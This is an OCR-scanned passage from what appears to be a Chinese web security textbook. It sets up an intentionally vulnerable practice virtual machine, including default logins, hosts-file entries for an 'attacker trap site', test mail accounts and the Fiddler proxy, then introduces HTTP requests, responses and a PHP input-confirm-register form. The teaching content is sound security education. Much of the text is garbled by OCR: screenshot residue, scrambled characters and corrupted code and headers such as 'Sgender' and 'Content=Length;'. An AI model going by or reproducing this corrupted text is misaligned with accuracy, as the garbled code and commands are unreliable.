压 到 合适 的 路 径 即 可 。 解 压 后 的 大 小 约 为 600M， 所 以 请 安装 到 至 少 还 有 800M 以 上 剩余 空间 的 


盘 符 中 。 也 可 以 安装 至 U 盘 或 SD 卡 中 。 




















假定 解压 路 径 为 “文档 ”文件 夹 。 这 样 ， 文 档 文件 夹 内 就 会 生成 一 个 名 为 WASBOOK 的 文件 夹 。 





2-6 WASBOOK 文件 夹 的 内 容 








| 
多 口 -| ， 文档 WASBOOK ， ~|4 中 二 wasaook p| 
文件 (| 编辑 (E) ”可 看 V) 工具 (T) 者 助 (H) | 
组 织 ” 。 包 全 到 库 中 ~ 。 共享 ” 刻录 “新 建文 件 夫 二 -~ @| 
Re < 名 称 到 修改 日 其 并 大 
及 下 载 到 国 source 
图 点 本 口 wasbookvmdk 6133 
最 近 沪 问 的 位 置 [DD wasbookvm VMX 文件 2 KB 














多 虚拟 机 启动 确认 


双击 WASBOOK 文件 夹 中 的 wasbook.vmx， 就 会 启动 VMware Player。 第 一 


Player 时 ， 会 出 现 以 下 对 话 框 时 ， 请 务必 选择 “我 已 移动 该 虚拟 机 ”。 


2-7 ”务必 选择 “我 已 移动 该 虚拟 机 ” 


了 
虽 ubuntujeos10.04 - VMware Player ( 仅 用 于 非 商业 用 途 ) | 尺 








player(P) ~ | Bp ~ 加 局 « 


UbuntuJeOS10.04 - VMware Player 





此 虚拟 机 可 能 已 被 移动 或 复制 。 


为 了 配置 特定 的 管理 和 网 络 功能 ，VMware Player 需要 知道 是 否 
已 移动 或 复制 了 此 虚拟 机 。 


如 果 您 不 知道 ， 请 回答 我 已 复制 该 虚拟 机 (P) 








[我 已 移动 该 虚拟 机 (M) [我 已 复制 该 虚拟 机 (p)]】 [ 。 取消 




















次 启动 VMware 





如 果 显 示 下 图 这 样 的 VMware Tools 下 载 对 话 框 ， 请 点 击 “ 以 后 提醒 我 "， 然 后 Linux 就 开始 





局 动 了 。 








2-8 不 需要 VMware Tools 
[x 


“软件 更 新 





ey 以 下 软件 可 世 下 载 : 
VMware Tools for Linux - 版 本 9.6.2 


必要 启用 虚拟 机 的 高 级 功能 ， 需 下 载 并 
安装 VMware Tools。 


您 要 执行 什么 操作 ? 
[下 载 并 安装 (D) | | 以 后 提醒 我 (R) | 


局 本 
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当 出 现 wasbook login: 的 登录 提示 时 ， 说 明 启 动 已 经 完成 。 这 时 要 先 按 下 Ctrl+G 将 光标 切换 





至 虚拟 机 上 ， 输 入 用 
就 会 出 现 以 下 画面 。 





图 2-9 登录 虚拟 机 后 ， 执 行 ifconfig 命令 
UbuntujeOS10.04 - VMware Player ( 仅 用 于 非 商 业 用 途 ) 


EN x 


名 





Player(P) ~ M2 


Ubuntu 10.04.1 LTS wasbook ttyl 


uasbook login: i TOOT 


Pa rd: 

Last login: Mon Jul ?了 15:53:4 
Linux wasbook 2.6.32-24-gener 
i686 GNUALimux 

Ubuntu 10.04.1 LTS 


omn ttu1l 


J. [AY 
ic-pae #39-Ubuntu SMP Wed Jul 28 07:39:26 UTC 2010 


Melcome to Ubuntut 
¥* Documentation: https://he 
AAT : 划 ifconf etho0 
Etho Link encap :Ethernet _Hupddr 
inet addr :92 .168 .126 .128| 
inet6 addr: fe80 29ff :fe3c:1f 
UP BROADCAST RUNNI MULTICAST MTU:1500 Metric:1 
3 errors:0 dropped:0 overruns:0 frame:0 
9 erroi dropped:Q ouerrums:0 carrier :0 
collisions:0 txqueuelen:1000 
RX butes:1524 (1.5 KB) TX butes:1806 (1.8 KB) 
Interrupt :17 Base address:0x1080 


root@wasbook:"# _ 





2 


De 





这 时 ， 记 下 inet addr: 右边 显示 的 IP 地 址 。 


户 名 root， 密 码 wasbook， 就 能 登录 成 功 。 接 着 在 提示 符 中 输入 ifconfig eth0， 





这 个 IP 地 址 在 后 面 设置 hosts 文件 时 会 用 到 。 至 

















此 ， 虚 拟 机 的 启动 确认 就 完成 了 。 


令 虚 拟 机 的 使 用 方法 
这 里 简单 介绍 一 下 虚拟 机 的 使 用 方法 。 


今 键 盘 输 入 切换 
要 在 虚拟 机 画面 上 输入 时 ， 只 需 在 激活 VMware Player 的 窗 
VMware Player 内 部 黑色 区 域 中 的 任 一 位 置 按 下 鼠标 。 














口 后 按 下 Ctrl+G 即 可 。 或 者 在 





在 虚拟 机 中 输入 完毕 想 要 切换 至 其 他 窗口 时 ， 可 按 下 Ctrl+Alt。 
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今 退 出 

退出 虚拟 机 有 两 种 方法 。 

如 果 是 使 用 root 登录 的 话 ， 可 以 用 以 下 命令 退出 虚拟 机 。 输 入 阴影 部 分 的 内 容 。 执 行 后 就 
会 立即 开始 关闭 操作 系统 。 





# shutdown -h now 














男 一 种 方法 为 ， 在 出 现 登录 提示 时 输入 用 户 名 down， 此 处 不 需要 输入 密码 ， 然 后 便 会 自动 
开始 关闭 操作 系统 。 无 论 哪 种 方法 ， 在 Linux 操作 系统 关闭 之 后 ，VMware Player 都 会 自动 退出 。 


O Linux 的 操作 
关于 Linux 的 操作 ， 本 书 不 做 讲述 ， 请 参考 Linux ( Ubuntu ) 的 相关 书籍 或 网 站 。 

















令 编 辑 hosts 文件 
为 了 能 顺利 地 执行 试验 ， 在 此 请 将 以 下 站 名 添加 到 Windows 的 hosts 文件 中 。 
ee 存在 安全 隐患 的 网 站 


trap.example.com'…… 攻 击 者 准备 的 陷阱 网 站 


hosts (通常 路 径 为 C:\Windows\System32\drivers\etc\hosts ) 文件 需要 有 管理 者 权限 才能 编辑 
( Windows Vista 或 Windows 7 的 情况 下 )， 右 击 开 始 菜单 中 的 记事 本 ， 选 择 “以 管理 者 身份 运 
行 "。 用 记事 本 打开 hosts 文件 时 ， 在 “打开 ”对 话 框 的 “文件 种 类 ”中 要 选择 “全 部 文件 ”， 这 
样 才能 显示 出 hosts 文件 。 

用 记事 本 添加 以 下 内 容 ( 阴影 部 分 ) 并 保存 。IP 地 址 部 分 要 替换 为 刚才 自己 记录 下 的 虚拟 机 
的 全 地 址 。 





























hosts 文件 的 编辑 范例 

# localhost name resolution is handled within DNS itself. 
# T2020 和 Ll localhost 

# 和 localhost 

127001 localhost 

ee 7 于 儿 刘 example.jp trap.example.com 














如 此 设置 后 ，examplejp 和 trap.example.com 就 都 和 虚拟 机 的 卫 地 址 (本 例 为 192.168.126.128 ) 
绑 定 了 。 

另外 ， 有 些 防 病毒 软件 可 能 会 检测 到 hosts 文件 被 更 改 而 阻止 此 操作 。 这 种 情况 下 需要 解除 
防 病毒 软件 的 阻止 。 


令 使 用 ping 确认 连接 
修改 完 hosts 文件 后 ， 打 开 Windows 的 命令 提示 符 ， 输 入 ping example.jp， 即 能 通过 ping 命 
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令 来 确认 网 络 连接 (请 先 启 动 虚拟 机 )。 如 果 不 能 连接 成 功 ， 则 可 能 为 以 下 原因 。 


> 启动 虚拟 机 的 过 程 中 时 选择 了 “我 已 复制 该 虚拟 机 ” 
> IP 地 址 错误 

> hosts 文件 中 的 网 址 错误 
> 编辑 hosts 文件 时 没有 以 管理 者 身份 运行 


如 果 错 选 为 “我 已 复制 该 虚拟 机 "， 将 虚拟 机 文件 删除 后 重新 解压 ZIP 文件 即 可 。 而 IP 地 址 
是 否 错误 则 可 以 从 ping 命令 的 执行 结果 中 看 出 。 





令 Apache 与 PHP 的 运行 确认 
通过 ping 确认 完 网 络 连接 后 ， 启 动 Internet Explorer (IE ) 浏览 器 ， 在 地 址 栏 中 输入 http:// 
example.jp/phpinfo.php， 就 会 显示 图 2-10 所 示 的 页 面 。 


六 图 2-10 成 功 连接 虚拟 机 上 的 Web 服务 器 

















| 息 phpinfo() - Windows Internet Explorer TB 
GO v 司 http://example.jp/phpinfo.php ba | | x 
次 哈 | 大 phpinfo() 癌 je 
































Configuration | /etc/php5/apache2 
一 











多 设置 并 确认 邮箱 账号 

接 下 来 ， 为 了 试验 发 送 邮件 时 的 安全 隐患 ， 需 要 设置 邮箱 账号 。 此 设置 将 在 4.9 节 和 4.11 节 
使 用 ， 所 以 现在 暂时 不 设置 也 没有 影响 。 

在 您 使 用 的 电子 邮件 客户 端 上 设置 以 下 账号 。 之 所 以 设置 2 个 账号 ， 是 因为 试验 中 假设 有 2 
类 收 件 人 。 


会 表 2-1 试验 用 邮箱 账号 



































用 户 名 密码 邮箱 地 址 POP3 服务 器 SMTP 服务 器 
wasbook Wasbook wasbook@example.jp example.jp example.jp 
bob Wasbook bob@example.jp example.jp example.jp 
使 用 wasbook 的 账号 给 bob 发 封 邮件 ， 即 可 检测 以 上 设置 是 否 成 功 。 如 果 bob 能 正常 收 到 ， 
就 表示 配置 正常 。 





如 果 无 法 连接 POP3 服务 器 的 话 ， 请 参考 本 章 最 后 一 页 。 
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2.4 安装 Fiddler 


为 了 深入 理解 HTTP， 本 书 将 通过 使 用 免费 工具 Fiddler 来 观察 并 修改 HTTP 数据 包 。 本 节 
首先 解说 Fiddler 的 安装 方法 。 





令 什么 是 Fiddler 

Fiddler 是 一 球 由 Eric Lawrence 开发 的 免费 的 Web 应 用 调试 工具 。Fiddler 在 Windows 计 
算 机 上 以 代理 的 方式 运行 ,能够 观察 和 修改 HTTP 的 通信 和 内容。 同类 产品 还 有 Burp suite 和 
Paros 等 。 但 是 ， 和 其 他 软件 相 比 ，Fiddler 不 易 出 现 乱 码 问题 ， 且 安装 容易 ， 因 此 本 书 将 重点 对 
Fiddler 进行 解说 。 


























人 安装 Fiddler 
Fiddler 的 最 新 版 ， 可 以 在 http://fiddler2.com/get-fiddler 下 载 。 点 击 “Download Fiddler 2” 按 
钮 即 可 下 载 。 下 载 后 点 击 安装 即 可 。 


令 Fiddler 的 运行 确认 及 简单 用 法 
Fiddler 能 够 从 开始 菜单 处 启动 。 启 动 后 画面 如 图 2-11。 这 时 ， 请 点 击 “Decode 。 


2-11 Fiddler 的 启动 画面 


















































| [ses 
File Edit Rules Tools View Help GET/book 园 Geofdge 
品读 Replay X， PGo | 右 Stream | 服 Decode | Keep: All sessions ， 图 AnyProcess 前 Find 罗 Save | 加 介 圈 Browse - 俄 Clear Cache 下 TextWizard | J 
四 fit | ahead Host URL © satstic | Inspectors | £ AutoResponder [名 Composer | 口 Fiters | 目 Log | = Timeine 
目 ! 20 HTP www.telerik.com /UpdateCheck.aspx?ispe! 
车 2 200 HTIP api.t.sina.com,.n statusesjunread.xml 


‘Select one or more sessions in the Web sessions 1ist to view performance 
Statistics, 





Think selenium 
es es 2 sr Sev Ep ealon and maintenance. 
ht m= fr 





4 几 上 


ETT sow chant 


| 县 capurne 二 AlProcesses 2 CustomRules.js was loaded at: Mon Jul 7 16:08: 12UTC+8 2014 
E 


























Fiddler 启动 时 会 修改 Internet Explorer( 下 ) 的 代理 设置 。 这 时 ， 防 病毒 软件 可 能 会 阻止 代理 
设置 的 变更 。 此 情况 下 请 解除 防 病毒 软件 的 阻止 。 

确认 启动 Fiddler 后 , 用 正 打开 http://example 0 php (虚拟 机 上 的 网 页 )。 如 果 已 经 
显示 有 phpinfo.php 的 话 ， 按 F5 刷新 一 下 页 面 即 可 。 这 时 会 显示 如 网 2-12 的 页 面 。 
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图 2-12 通过 Fiddler 观察 HTTP 通信 
© Fiddler Web Debugger 己 | 回 | 习 


File Edit Rules Tools View Help SET/book 圈 GeoEdee 
避 全 Replay X- Go | 时 Stream i 灌 Decode | Keep: All sessions * 井 Any process 抠 Find 区 Save | 图 四 碟 Browse - 钨 Clear cache 了 TextWizard | 到 


加 statistics | BW Inspectors | £ AutoResponder [3H Composer | Fiters | 目 -too| 二 Tmeine 
Headers | TextView | WebForms | HexView | Auth | Cookies |[Raw | SON | XML | 















































Result Protocol Host URL 














































目 1 200 ”HT www.telerik.com /UpdateCheck.aspx 
{2 200 HTTP m.openapi.360.n /msg/sort?session=1: [SET http: et p/hointo: 3 ER 
外 IAccept: text/html, application/xhtml+xm1l, </* 

@3 502 HTIP mopenapi.360,an /msg/sort?session 140 区 
四 4 200 HTTP miserupdate,aliyun.... /data/2.4.0.0/brfversion.l| juser-agent: oe o EL MSIE 9.0; Windows NT 6.1; Trident/5.0) 
目 站 Accept-Encodi 
国 5 200 HTP miserupdate.alyun..,. /data/brf2.dat_2014070 有 有 |ACCepttinco esp-ATide 
@s 502 ”HTTP m.openapi,360.n /msg/sort?session=140 t: example. 
€37 200 HT example.ip /phpinfo.php Pr agmat orcache 
区 js 200 HTP Example, 训 jphpinfo,php?=PHPE956| 
国 s 200 ”HTP example, 训 ”jphpinfo.php?=SUHO856| - 
国 o。 zo Hp aaPHPE956 [Fn bress cui+tEnter to highight al) Viewin Notepad 
让 200 ”HER end pt GetSyntaxView | Transformer | Headers | TextView | ImageView | HexView | Webview | Auth | 
国 2 20 HTmp example,ip _/phpinfo,php? =PHPES! 4 | 
国 B 2z0 HTPp example.ip jphpinfo.php? =pHPE9S6 四 Cin | cookes |[Raw | 25oN | xmL | 
去 了 HTTP/1.1 200 0 ~ 
国 4 20 FM example ip PRnfPh6z=SUH0856| |paref hon: 07 Ju 2014 08:36:45 arr 

Server: Apache/2. 2.14 (Ubuntu) 国 


X-Power ed-By: PHP/5.3.2-1ubuntu4.2 
Vary: Accept-Encoding 
content-Length: 48927 

Keep-Alive: timeout=15, max=97 
[Connection: Keep-Alive” 


“ [el » 


[en , (press Ctl+Enter to highight al [ Viewin Notepad ] 
































天 capturing ”三 AlProcesses 1/14 http://example.ip/phpinfo.php 








在 画面 左 侧 的 “Web Session” 中 选择 /phpinfo.php。 

另外 ， 请 从 界面 上 的 众多 标签 中 ， 选 择 画 面 上 方 的 “Inspect” 和 “Raw”， 以 及 画面 中 间 的 
“Raw”。 上 述 操作 的 目的 在 于 显示 HTTP 的 原始 状态 。 

Fiddler 除了 能 显示 HTTP 消息 ， 还 能 修改 这 些 消息 。 具 体内 容 在 下 一 章 会 做 讲述 

至 此 ,试验 环境 的 安装 就 全 部 结束 了 。 





参考 : 虚拟 机 的 数据 一 览 


已 建立 的 用 户 账号 
用 户 名 密码 目的 






































root Wasbook Linux 的 root 1 
wasbook wasbook 应 用 程序 管理 者 














alice wasbook bp 件 发 送 者 






































bob wasbook p 件 接收 者 
carol wasbook 其 他 
down (无 ) 关机 











安装 的 软件 





服务 软件 版 本 























OS(Linux) Ubuntu 10.04.1 LTS 
Web 服务 器 Apache 2.2.14 

PHP PHP: 5.3:2 

数据 库 PostgreSOL 8.4.4 

邮件 发 送 服务 器 Postfix 2.7.0 

POP3 服务 器 Dovecot 1.2.9 

SSH 服务 器 OpenSSH 5.3 
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Apache 的 根 目录 


/varwww 


参考 : 如 果 无 法 连接 试验 环境 的 POP3 服务 器 
设置 了 第 17 页 的 邮箱 账号 后 ， 如 果 无 法 连接 POP3 服务 器 ， 可 以 在 虚拟 机 上 执行 以 下 命令 
来 启动 Dovecot。 


























# /etc/init.d/dovecot start 











2-13 ”启动 Dovecot 


root@wasbook:# /etc/init.d/dovecot start 
# Starting IMAP/POP3 mail server douecot 





root@wasbook:"# 


如 图 2-13 所 示 ， 显 示 “OK” 即 表明 Dovecot 已 经 启动 。 这 时 请 再 次 连接 POP3 服务 器 。 


Web 安全 基础 : 
HTTP、 会 话 管理 、 


同 源 策略 


本 章 的 内 容 是 Web 安全 的 重要 基础 。 首 先 介 绍 HTTP 协 
议和 会 话 管理 ， 然 后 讲述 浏览 器 的 安全 性 功能 之 一 ， 也 是 
理解 跨 站 脚本 等 主要 安全 隐患 的 原理 的 必 备 知识 同 源 
策略 。 
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第 3 章 ，Web 安全 基础 : HTTP、 会 话 管理 、 同 源 策略 





3.1 HTTP 与 会 话 管理 


为 什么 要 学 习 HTTP 
Web 应 用 的 安全 隐患 


有 些 源 于 网 络 的 固有 特性 。 在 Web 应 用 中 ， 哪 些 信息 容易 泄漏 ， 哪 些 
信息 容易 被 算 改 ， 如 何 才能 保证 信息 安全 ? 正 是 因为 开发 人 员 缺 乏 这 些 知 识 ， 才 会 在 开发 时 埋 下 
安全 隐患 。 为 了 理解 诸 妇 

















此 类 源 自 Web 特性 的 安全 隐患 ， 就 必须 要 掌握 HTTP 和 会 话 管理 的 相 
关 知 识 。 而 这 也 是 本 节 要 讲述 的 内 容 。 
最 简单 的 HTTP 


在 正式 开始 前 ， 先 来 体验 下 最 简单 的 HTTP 吧 。31-001.php 中 有 如 下 PHP 代码 。 这 段 脚 本 
的 功能 为 显示 当前 时 间 。 


代码 清单 ”/31/31-001.php 


<body> 








<?php echo htmlspecialchars (date('G:i')) 
</body> 


7 








访问 http://example.jp/31/ 的 菜单 (以 下 写作 “/31/ 菜单 ”)， 点 击 “31-001: 当前 时 间 ” 链 接 
(图 3-1 )， 就 可 以 在 虚拟 机 上 执行 这 段 脚 本 了 。 


3-1 /31/ 菜单 


Fc 
息 http://examplejp/31/ - Windows Internet Explo 





[cIe| ¥ 


本 
国耻 mtpyeanpejpsy +|3[x|[E sng 














yr 
帘 收 5 夫 | 臣 htp//examplejp/31/ | IRO) 
3.1 HTTP 与 会 话 管理 


























执行 结果 如 图 3-2 所 示 。 
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图 3-2 显示 时 间 脚 本 
看 http://example.jpi31/31-001.php - Win.， x | 
二 | 全 | htp:Wexamplejpy31731-00L.php ~ | 分 | x | 


视 实 | httpi /ecample jp /a3 je 从 了 























与 此 同时 ， 在 后 台 ， 浏 览 器 会 向 服务 器 发 送 HTTP 请 求 (HTTP Request )， 而 收 到 浏览 器 请 
求 的 服务 器 则 会 向 浏览 器 发 回 HTTP 响应 (HTTP Response ) (图 3-3 )。 


3-3 HTTP 的 请 求 与 响应 


HTTP 请 求 
HTTP 响应 [DS 


令 使 用 Fiddler 观察 HTTP 消息 
我 们 可 以 使 用 Fiddler 来 观察 HTTP 消息 。 启 动 Fiddler 后 ,在 IE 浏览 器 上 刷新 刚才 的 页 面 
这 次 ,浏览 器 和 服务 器 之 间 的 通信 经 过 了 Fiddler， 所 以 在 Fiddler 上 能 够 看 到 HTTP 的 通 信 内 容 。 


3-4 通过 Fiddler 显示 HTTP 通信 

































[ 冉 Fiddler - HTTP Debugging proxy 








File Edit Rules Iools Yiew Help 
别 comment 好 Reissue X Remove ”jp Resume All | 名 Streaming vy BProcess Filter 对 5 i 


‘Web Sessions | << [加 statistics| 村 村 
六 Result Protocol Host URL 


HTTP example.jp _/31/31-001,php 
























系 AutoResponder | 蔚 Reques 朋 
WebFoems a Hexwiew 时 2 






























Accept-Encoding: gzip, defla 请 求 消息 
User-Agent: Mozilla/4. D ne ble; MSIE 7.0; Windows NT 6.0; GTB6.5; SLCC1; . R 7 
Host: examp1e. jp 

connection: Keep-Alive 
































Transformer | Headers | TextView | ImageView | Hexyiew | Webview | Auth | Caching | Privacy 












Keep-Alive: imeoutT15，maxr100 响应 消息 
|connection: Keep-Ali 


entERt- Types text/htm; charset=uTF-8 





<body> 
15:21</body> 








View in Notepad 























尖 capturing ”三 MlProcesses 111 http:f/example,jp/31/31-001.php 
[. J 


为 了 让 Fiddler 显示 HTTP 的 通信 情况， 如 图 3-4 所 示 ， 选 择 界面 上 方 的 “Inspectors”-“Raw” 
标签 以 及 界面 中 间 的 “Raw” 标 签 。 然 后 ， 在 界面 左 侧 选 择 31-001.php 请 求 。 

图 中 右 侧 红 框 中 的 内 容 就 是 浏览 器 与 Web 服务 器 之 间 互 相传 递 的 消息 。 下 面 ， 让 我 们 来 具 
体 看 一 下 这 些 内 容 。 
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令 请 求 消息 

Fiddler 界面 右 侧 上 半 部 分 显示 的 内 容 ， 是 浏览 器 向 服务 器 发 出 的 请 求 ， 被 称 为 请 求 消息 
(了 Request Message )。 

请 求 消息 的 第 1 行 被 称 为 请 求 行 (RequestLine )， 相 当 于 浏览 器 下 达 给 服务 器 的 命令 。 请 
求 行 由 请 求 方法 、URL ( URI) 和 协议 版 本 组 成 ， 它 们 之 间 以 空格 相隔 (图 3-5)。 在 Fiddler 界 
面 中 ， 请 求 行 上 显示 的 是 包含 了 Scheme (协议 ) 和 主机 名 (FQDN， 全 称 域名 ) 的 绝对 路 径 的 
URL， 这 是 因为 请 求 经 过 了 代理 ( Fiddler ) 的 缘故 ， 而 通常 情况 下 只 会 显示 相对 路 径 的 URL。 
































3-5 ”请 求 行 
GET /31/31-001.php HTTP/1.1 

请 求 方法 请 求 URL 协议 版 本 

HTTP 的 请 求 方法 除了 GET (取得 资源 ) 以 外 , 还 有 POST 和 HEAD 等 。GET 和 了 POST 与 
HTML 中 form 元 素 的 method 属性 指定 的 值 相同 。 关 于 POST 方法 后 面 还 会 讲述 。 

请 求 消息 的 第 2 行 及 以 后 的 内 容 被 称 为 请 求 头 信息 ( Header )， 其 格式 为 名 称 与 值 以 冒号 相 
隔 。 图 3-4 中 显示 了 很 多 请 求 头 信息 ， 但 其 中 只 有 Host 是 必需 的 了 。Host 表示 接收 信息 的 主机 名 
( FQDN ) 和 端口 号 (80 时 可 以 省 略 )。 























令 响 应 消息 
3-4 右 侧 的 下 半 部 分 显示 的 是 从 Web 服务 器 返回 的 内 容 ， 被 称 为 响应 消息 ( Response 
Message )。 如 图 3-6 所 示 ， 响 应 消息 包含 状态 行 、 响 应 头 信息 和 响应 正文 ( Body )。 
3-6 ”响应 消息 的 构造 


状态 行 HTTP/1.1 200 OK 





响应 头 信息 Date: Mon，10 Jan 2011 05:34:30 GMT 
Server: Apache/2.2.14 (Ubuntu) 
X-Powered-By: PHP/5.3.2-lubuntu4.2 
Vary: Accept-Encoding 
Content-Length: 20 

Keep-Alive: timeout=15, max=100 
Connection: Keep-Alive 


Content-Type: text/html; charset=UTF-8 





空 和 








响应 正文 <body> 
14:34</body> 














中 如 果 HTTP 协议 版 本 为 1.0，Host 头 信息 也 可 以 省 略 。 
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多 状态 行 
状态 行 的 内 容 是 请 求 消息 经 过 服务 器 处 理 以 后 的 状态 (图 3-7 )。 
图 3-7 ”状态 行 的 构造 
HTTP/1.1 200 OK 
协议 版 本 状态 码 ”状态 描述 
状态 码 的 百 位 数 有 特殊 含义 ， 代 表 了 响应 的 几 种 状态 ( 表 3-1)。 常 见 的 状态 码 有 : 200 (成 
功 )、301 和 302 ( 重 定向 )、404 ( 找 不 到 资源 )、500 (服务 器 内 部 发 后 错 误 ) 等 。 


表 3-1 状态 码 的 说 明 

































































状态 码 概要 状态 码 概要 
1xx 处 理 正在 继续 4XX 客户 端 错误 
2xx 成 功 5xx 服务 器 错误 
3xx 重 定向 
令 响 应 头 信 息 


响应 消息 的 第 2 行 及 以 后 的 内 容 为 响应 头 信息 (图 3-6 )， 内 容 一 直到 出 现 空 行 ( 只 含有 换行 
符 的 行 ) 为 止 。 以 下 为 典型 的 响应 头 信息 。 





Content-Length 

显示 啊 应 正文 的 字 节 数 。 

Content-Type 

指定 为 MIME 类 型 。HTML 文档 的 情况 下 则 为 text/html。 下 表 列 出 了 常见 的 MIME 


类 型 。 


表 3-2 常见 的 MIME 类 型 





















































MIME 类 型 含义 MIME 类 型 含义 
text/plain 文本 image/gif GIF 图 像 
text/html HTML 文档 image/ipeg JPEG 图 像 
application/xml XML 文档 image/png PNG 图 像 
text/css CSS application/pdf PDF 文档 






























































分 号 之 后 的 charset=UTF-8 表示 HTTP 响应 的 字符 编码 。 字 符 编 码 必 须 被 正确 设置 ， 具 体 
原因 及 设置 方法 请 参考 第 6 章 。 











令 如 果 将 HTTP 比喻 为 对 话 
由 于 HTTP 会 持续 不 断 进行 请 求 与 响应 ， 所 以 将 其 比喻 为 人 们 的 对 话 或 许 会 更 形象 。 以 显示 
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时 间 的 脚本 为 例 ， 将 这 个 最 简单 的 HTTP 消息 以 对 话 的 形式 呈现 的 话 ， 大 概 就 像 下 面 这 样 "。 


< 顾客 : 现在 几 点 了 ? 


CE 1 








I 





接 下 来 我 们 看 一 个 复杂 些 的 HTTP 消息 的 例子 一 一 “输入 -确认 -注册 ”模式 的 表单 。 


输入 二 确认 一 注册 模式 


这 里 ， 通 过 观察 “输入 -确认 -注册 ”模式 中 输入 表单 (Input Form ) 的 HITP 消息 ， 而 望 


能 够 有 助 于 读者 更 深入 地 理解 HITP。 


以 下 分 别 为 输入 页 面 (31-002.php )、 确 认 页 面 (31-003.php ) 和 注册 页 面 (31-004.php ) 的 





代码 。 
代码 清单 ”/31/31-002.php 
<html> 
<head><title> 个 人 信息 输入 </title></head> 
<body> 


<form action="31-003.php" method="POST"> 

姓名 <input type="text" name="name"><br> 
邮箱 地 址 <input type="text" name="mail"><br> 
性 别 <input type="radio" name="gender" value=" 女 "> 女 
<input type="radio" name="gender" value=" 男 "> 男 <br> 
<input type="submit" value=" 确认 "> 

</form> 

</html> 





代码 清单 /31/31-003.php 





<?php 
$name = @$ POST['name']; 
$mail = @$ POST['mail']; 
$gender = @$ POST['gender']; 





?> 

<html> 

<head><title> 确认 </title></head> 

<body> 

<form action="31-004.php" method="POST"> 

姓名 :<?php echo htmlspecialchars ($name, ENT NOQUOTES, 'UTF-8'); ?><br> 
邮箱 地 址 :<?php echo htmlspecialchars ($mail, ENT NOQUOTES, 'UTF-8'); ?><br> 
性 别 :<?php echo htmlspecialchars (Sgender, ENT NOQUOTES, 'UTF-8'); ?><br> 





中 将 HTTP 比喻 成 对 话 的 灵感 ， 源 于 书籍 《Web 背后 的 技术 )[1] 与 《Web 技术 入 门 )[2]。 


<input type="hidden" name="name" value="<?php echo htmlspecialchars ($name, 





ENT COMPAT, 
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'UTF-8'); ?>"> 

<input type="hidden" name="mail" value="<?php echo htmlspecialchars ($mail, ENT COMPAT, 
UDE=8) 3 ?3 

<input type="hidden" name="gender" value="<?php echo htmlspecialchars ($gender, ENT_ 
COMPAT, 'UTF-8'); ?>"> 

<input type="submit" value=" 注册 "> 








</Eorm> 
</html> 











代码 清单 ”/31/31-004.php 





<?php 
Sname = @$ POST['name']; 
$mail = @$ POST['mail']; 
$gender = @$ POST['gender']; 
// 下 面 开始 处 理 























?> 
<html> 
<head><title> 注册 成 功 </title></head> 

<body> 

姓名 :<?php echo htmlspecialchars ($name, ENT NOQUOTES, 'UTF-8'); ?><br> 

了 箱 地 址 :<?php echo htmlspecialchars ($mail, ENT NOQUOTES, 'UTF-8'); ?><br> 
性 别 :<?php echo htmlspecialchars ($gender, ENT NOQUOTES, 'UTF-8'); ?><br> 
已 注册 

</body></html> 


























要 在 虚拟 机 上 执行 的 话 ， 可 以 点 击 /31/ 菜单 中 的 “31-002: 输入 -确认 -注册 ”链接 。 然 后 
就 会 显示 如 下 页 面 (图 3-8 )。 








图 3-8 输入 页 面 




















[年 入 全 -Windows internet Explorer ll 
GO [evo/eanpejpsyato02pte -|?|xjlI3an pv 
次 收 芒 夫 。 | 咎 个 人 信息 I 上 A(O) ~ 
姓名 入 多 汪 
邮箱 地 址 toku@exampejp 
性 别 回 女 @ 男 














| J 


在 页 面 上 填 入 姓名 、 邮 箱 和 性 别 后 点 击 “ 确 认 ” 按 钮 。 这 时 ，HTTP 请 求 消息 就 可 以 在 
Fiddler 中 看 到 (图 3-9 )。 
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图 3-9 ”在 输入 页 面 填写 完毕 后 点 击 “ 确 认 ” 时 Fiddler 中 显示 的 HTTP 请 求 消息 
[小 Fiddler - HTTP Debugging Proxy [ET 一 > 一 | 


File Edit Rules Iools Yiew Help 
Comment $y Reissue XRemove » Pb Resume All | 是 streaming 1 AutoDecode | 图 Process Filter 前 Find 区 Save | 8 


和 < | statistics | BW Inspectors | 笃 bse] Barest Buider | 是 Log | 回 Fiters | = Tmeine 
六 Result Protocol Host URL Headers | Textyiew | WebForms | Hexwiew | Auth |[Raw | xML 








» 












































加 1 200 HTTP example,ip 131/31-002,php 2 和 ee 
面 


POST http:y/examp1e ip/31Z31-003.Dhp CT 
者 已 200 HTTP example,jp /31/31-003,php 





IACCEPET: Tmage/gif, image/x-; xbitmap ， mage/jpeg, image/pjpeg, application/x-ms-al 
Referer: http://example. jp/31/31-002 

IAcCept-Language: ja 

Content-Type: application/x-www-form-urlencoded 

UA-CPU: x86 

Accept-Encoding: gzip, deflate 

User-Agent: Mo2ilia/4.0 Ccompatible; MSIE 7.0; Windows NT 6.0; GTB6.5; SLCC1; . 
Connection: Keep-Alive 

Content-Length: 70 

Host: example. jp 

Pragma: no-cache 





name=%E5%BENB3%E 4%BS%BSNEGHBSHAN mai l=tokuaexample. jpugender=%E7%94%B7 





| Find,.. View in Notepad 














Transformer | Headers Textyiew Imagewiew HexView ‘WebView Auth Caching 
Privacy Raw | XML 





HTTP/1.1 200 OK 

Date: Mon, 10 Jan 2011 05:42:27 GMT 
Server: Apache/2.2.14 [Ubuntu 
X-Powered-By: PHP/5.3.2-1lubuntu4.2 
Vary: Accept-Encoding 

Content-Length: 379 

Keep-Alive: er max=100 
Connection: Keep-A 

content-Type: 全 认 charset=UTF-S 


<html> 
<head> <tit]1e> 确 认 </+title></head> = 


Find,,, View in Notepad 


咱 





























游 Capturing 去 刘 Processes 112 http://example,jp/31/31-003.php 














人 POST 方法 
此 处 显示 的 是 从 图 3-9 的 请 求 消息 中 摘 取 的 一 些 重要 内 容 。 








POST /31/31-003.php HTTP/1.1 

Referer: http://example.jp/31/31-002.php 
Content-Type: application/x-www-form-urlencoded 
Content=Length; 70 

Host: example.jp 





消息 体 ] 
name=%ES5%SBESB3%E4%B8%SB8%E6%B5SA9&mail=toku@example.jp&gender=%E7%94%B7 





请 求 行 开头 处 的 方法 变 成 了 POST。 与 GET 不同 的 是 ， 空 行 下 面 所 填写 的 值 也 被 发 送 了 。 
而 这 部 分 内 容 就 被 称 为 消息 体 ( Message Body )。 


令 消 息 体 
通过 POST 方法 发 送 的 请 求 消息 中 包含 消息 体 。 与 响应 消息 一 样 ， 消 息 头 和 消息 体 用 空 行 相 
隔 。 要 通过 POST 方法 发 送 的 值 被 放 在 i te 

与 POST 发 送 值 相关 的 消息 头 为 Content-Length 和 Content-Type。 

Content-Length 为 消息 体 的 字 节 数 。 

